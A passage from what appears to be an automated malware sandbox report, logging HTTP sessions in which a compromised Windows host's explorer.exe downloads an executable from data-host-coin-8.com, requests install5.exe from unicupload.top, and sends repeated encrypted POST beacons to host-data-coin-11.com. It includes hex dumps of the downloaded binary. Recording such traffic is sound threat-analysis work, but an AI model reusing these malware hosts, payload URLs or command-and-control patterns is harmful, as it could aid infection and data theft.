Jan 9, 2022 18:47:45.064043999 CET	1072	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:47:44 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4c ed a1 88 70 bc 57 dd 43 d4 fa 20 87 20 e7 c3 9a 57 2a e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9LpWC W*c0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49755	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:47:45.588249922 CET	1073	OUT	GET /files/2184_1641247228_8717.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: data-host-coin-8.com
Jan 9, 2022 18:47:46.129401922 CET	1074	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:47:45 GMT Content-Type: application/x-msdos-program Content-Length: 358912 Connection: close Last-Modified: Mon, 03 Jan 2022 22:00:28 GMT ETag: "57a00-5d4b4a60838eb" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6b 91 a1 53 2f f0 cf 00 2f f0 cf 00 2f f0 cf 00 31 a2 5a 00 3d f0 cf 00 31 a2 4c 00 57 f0 cf 00 08 36 b4 00 2a f0 cf 00 2f f0 ce 00 ee f0 cf 00 31 a2 4b 00 10 f0 cf 00 31 a2 5b 00 2e f0 cf 00 31 a2 5e 00 2e f0 cf 00 52 69 63 68 2f f0 cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 74 f1 e5 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 3c 04 00 00 4a 02 00 00 00 00 00 c0 34 02 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 41 c1 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 39 04 00 3c 00 00 00 00 30 06 00 f8 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 06 00 14 23 00 00 50 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 a6 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 e0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 3a 04 00 00 10 00 00 00 3c 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 60 9a 01 00 00 50 04 00 00 8c 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 61 6d 69 63 61 6b 05 00 00 00 00 f0 05 00 00 02 00 00 00 cc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 6f 73 00 00 00 00 4b 00 00 00 00 00 06 00 00 02 00 00 00 ce 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6d 6f 64 61 76 00 00 ea 00 00 00 00 10 06 00 00 02 00 00 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 75 67 69 72 6f 66 93 0d 00 00 00 20 06 00 00 0e 00 00 00 d2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 59 00 00 00 30 06 00 00 5a 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a2 3e 00 00 00 90 06 00 00 40 00 00 00 3a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 44 04 00 00 00 00 00 6c 3c 04 00 82 3c 04 00 92 3c 04 00 a2 3c 04 00 be 3c 04 00 d2 3c 04 00 e6 3c 04 00 f6 3c 04 00 10 3d 04 00 2a 3d 04 00 42 3d 04 00 56 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$kS///1Z=1LW6/1K1[.1^.Rich/PELt`<J4P@A,9<0Y#PX@.text4:< `.data`P@@.pamicak@.dosK@.modav@.nugirof @.rsrcY0Z@@.reloc>@:@BDl<<<<<<<<==B=V
Jan 9, 2022 18:47:46.129466057 CET	1076	IN	Data Raw: 3d 04 00 62 3d 04 00 70 3d 04 00 88 3d 04 00 96 3d 04 00 b8 3d 04 00 c4 3d 04 00 d8 3d 04 00 f4 3d 04 00 0e 3e 04 00 2a 3e 04 00 3c 3e 04 00 50 3e 04 00 5e 3e 04 00 6e 3e 04 00 80 3e 04 00 96 3e 04 00 aa 3e 04 00 b8 3e 04 00 c8 3e 04 00 dc 3e 04 Data Ascii: =b=p=======>*><>P>^>n>>>>>>>>>?.?D?T?l????????@&@2@>@P@j@v@@Z<@@@@A"A.ABARAfAxAAAAAAA
Jan 9, 2022 18:47:46.129506111 CET	1077	IN	Data Raw: 00 66 00 6f 00 78 00 61 00 72 00 6f 00 77 00 75 00 6e 00 61 00 63 00 65 00 66 00 6f 00 78 00 75 00 76 00 00 00 79 69 76 69 6a 75 72 75 64 69 63 61 76 61 63 65 63 61 77 75 67 75 64 61 77 6f 72 69 77 6f 73 00 62 00 6f 00 68 00 6f 00 77 00 6f 00 67 Data Ascii: foxarowunacefoxuvyivijurudicavacecawugudaworiwosbohowogizawekacucZowivukivoyujegwesipijezocayepazFiludujovavaYisidabYukohekoyupilu kojifer lobiyifitodayif wuzenuv
Jan 9, 2022 18:47:46.129545927 CET	1079	IN	Data Raw: 00 65 00 00 00 00 00 43 3a 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 20 28 78 38 36 29 5c 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 53 74 75 64 69 6f 20 39 2e 30 5c 56 43 5c 69 6e 63 6c 75 64 65 5c 73 74 72 65 61 6d 62 75 66 00 d0 aa 40 Data Ascii: eC:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include\streambuf@AGAGAlAOArAUAANAAAgAlAoA"out of range"std::ctype<wchar_t>::_Do_widen_s
Jan 9, 2022 18:47:46.129586935 CET	1080	IN	Data Raw: 00 63 00 72 00 74 00 5f 00 62 00 6c 00 64 00 5c 00 73 00 65 00 6c 00 66 00 5f 00 78 00 38 00 36 00 5c 00 63 00 72 00 74 00 5c 00 73 00 72 00 63 00 5c 00 78 00 6d 00 62 00 74 00 6f 00 77 00 63 00 2e 00 63 00 00 00 00 00 00 00 00 00 5f 00 5f 00 5f Data Ascii: crt_bld\self_x86\crt\src\xmbtowc.c___mb_cur_max_l_func(locale) == 1 \|\| ___mb_cur_max_l_func(locale) == 2f:\dd\vctools\crt_bld\
Jan 9, 2022 18:47:46.129627943 CET	1081	IN	Data Raw: 00 65 00 6c 00 66 00 5f 00 78 00 38 00 36 00 5c 00 63 00 72 00 74 00 5c 00 73 00 72 00 63 00 5c 00 6d 00 65 00 6d 00 6d 00 6f 00 76 00 65 00 5f 00 73 00 2e 00 63 00 00 00 00 00 63 73 6d e0 01 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 20 05 93 Data Ascii: elf_x86\crt\src\memmove_s.ccsm ...Assertion FailedErrorWarning%@%@%@f:\dd\vctools\crt_bld\self_x86\c
Jan 9, 2022 18:47:46.129667044 CET	1083	IN	Data Raw: 00 67 00 72 00 61 00 6d 00 20 00 6e 00 61 00 6d 00 65 00 20 00 75 00 6e 00 6b 00 6e 00 6f 00 77 00 6e 00 3e 00 00 00 00 00 77 00 63 00 73 00 63 00 70 00 79 00 5f 00 73 00 28 00 73 00 7a 00 45 00 78 00 65 00 4e 00 61 00 6d 00 65 00 2c 00 20 00 32 Data Ascii: gram name unknown>wcscpy_s(szExeName, 260, L"<program name unknown>")__crtMessageWindowWCorExitProcessmscoree.dll( (_Strea
Jan 9, 2022 18:47:46.129707098 CET	1084	IN	Data Raw: 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 10 00 10 00 10 00 10 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 9, 2022 18:47:46.129745007 CET	1085	IN	Data Raw: 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{\|}~
Jan 9, 2022 18:47:46.129784107 CET	1087	IN	Data Raw: 00 00 00 5f 00 43 00 72 00 74 00 49 00 73 00 56 00 61 00 6c 00 69 00 64 00 48 00 65 00 61 00 70 00 50 00 6f 00 69 00 6e 00 74 00 65 00 72 00 28 00 70 00 55 00 73 00 65 00 72 00 44 00 61 00 74 00 61 00 29 00 00 00 00 00 00 00 54 68 65 20 42 6c 6f Data Ascii: _CrtIsValidHeapPointer(pUserData)The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).Invalid
Jan 9, 2022 18:47:46.302321911 CET	1088	IN	Data Raw: 65 20 66 61 69 6c 75 72 65 2e 0a 00 00 00 00 00 00 54 68 65 20 42 6c 6f 63 6b 20 61 74 20 30 78 25 70 20 77 61 73 20 61 6c 6c 6f 63 61 74 65 64 20 62 79 20 61 6c 69 67 6e 65 64 20 72 6f 75 74 69 6e 65 73 2c 20 75 73 65 20 5f 61 6c 69 67 6e 65 64 Data Ascii: e failure.The Block at 0x%p was allocated by aligned routines, use _aligned_free()_msize_dbg%hs located at 0x%p is %Iu bytes long.%hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).HEAP CORRU

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.3	49760	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:47:49.449064016 CET	1550	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xjbxvifs.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 220 Host: host-data-coin-11.com
Jan 9, 2022 18:47:49.453605890 CET	1551	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 84 de 98 66 5d 02 c9 a1 c1 64 41 cd a4 6e Data Ascii: i;G~CE5i[nwmFu$f]dAnI6ar27\\|ONx`Y\6O1v>%baFFBRK8:)o~CmNr072PC!G=YSW~
Jan 9, 2022 18:47:50.003618956 CET	1590	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:47:49 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.3	49761	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:47:50.651777983 CET	1591	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pynrhmvhj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 117 Host: host-data-coin-11.com
Jan 9, 2022 18:47:50.651798010 CET	1591	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 99 66 5d 02 c8 a1 c1 64 1e b6 b2 61 Data Ascii: i;G~CE5i[nwmFu$f]da=DomQm ;;[sX\|1)
Jan 9, 2022 18:47:51.209096909 CET	1679	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:47:51 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.3	49767	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:47:51.708017111 CET	1691	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qlrgaved.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 157 Host: host-data-coin-11.com
Jan 9, 2022 18:47:51.711590052 CET	1691	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 96 66 5d 02 c8 a1 c1 64 5b d2 cf 7e Data Ascii: i;G~CE5i[nwmFu$f]d[~ZddlrI1I`Vhp?'Xgz<-V,d9;~9(z/(81?(>Q9
Jan 9, 2022 18:47:52.262172937 CET	1731	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:47:52 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.3	49774	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:47:52.596065998 CET	1748	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xhqofq.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 130 Host: host-data-coin-11.com
Jan 9, 2022 18:47:52.596142054 CET	1748	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 97 66 5d 02 c8 a1 c1 64 10 97 dd 09 Data Ascii: i;G~CE5i[nwmFu$f]dp3yF`C5,@\aZ`?KDw96^W[):
Jan 9, 2022 18:47:53.161501884 CET	1787	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:47:52 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.3	49781	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:47:53.670918941 CET	2016	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xjnbybe.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 114 Host: host-data-coin-11.com
Jan 9, 2022 18:47:53.670933962 CET	2016	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 94 66 5d 02 c8 a1 c1 64 5f bd d8 20 Data Ascii: i;G~CE5i[nwmFu$f]d_ eF&HE9B"zu[S!(&
Jan 9, 2022 18:47:54.238461971 CET	2230	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:47:54 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.3	49787	54.38.220.85	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:47:54.299978018 CET	2233	OUT	GET /install5.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: unicupload.top
Jan 9, 2022 18:47:54.318223000 CET	2233	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Sun, 09 Jan 2022 17:46:40 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.3	49788	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:47:54.536928892 CET	2236	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qbhyoygecf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 341 Host: host-data-coin-11.com
Jan 9, 2022 18:47:54.536937952 CET	2237	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 95 66 5d 02 c8 a1 c1 64 1a 99 d0 74 Data Ascii: i;G~CE5i[nwmFu$f]dtf=%C)y^7!;)[m#tS(6jRZ ]N0I9b)d\g9z@/Se7L2<1Ui'dsDEP- p0^6
Jan 9, 2022 18:47:55.092643976 CET	2243	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:47:54 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49875	67.199.248.10	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.3	49793	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:47:55.325921059 CET	2246	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://deiypnos.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 151 Host: host-data-coin-11.com
Jan 9, 2022 18:47:55.325973988 CET	2246	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 92 66 5d 02 c8 a1 c1 64 2c 8a 86 69 Data Ascii: i;G~CE5i[nwmFu$f]d,i<yHI@MDOIm\l4l$lA\cZd i/xTj~~
Jan 9, 2022 18:47:55.888828039 CET	2252	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:47:55 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.3	49797	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:47:56.112133026 CET	2256	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ccuaitw.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 117 Host: host-data-coin-11.com
Jan 9, 2022 18:47:56.112198114 CET	2256	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 93 66 5d 02 c8 a1 c1 64 00 aa 92 07 Data Ascii: i;G~CE5i[nwmFu$f]dBc{T6Uw&6a-
Jan 9, 2022 18:47:56.691019058 CET	2258	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:47:56 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 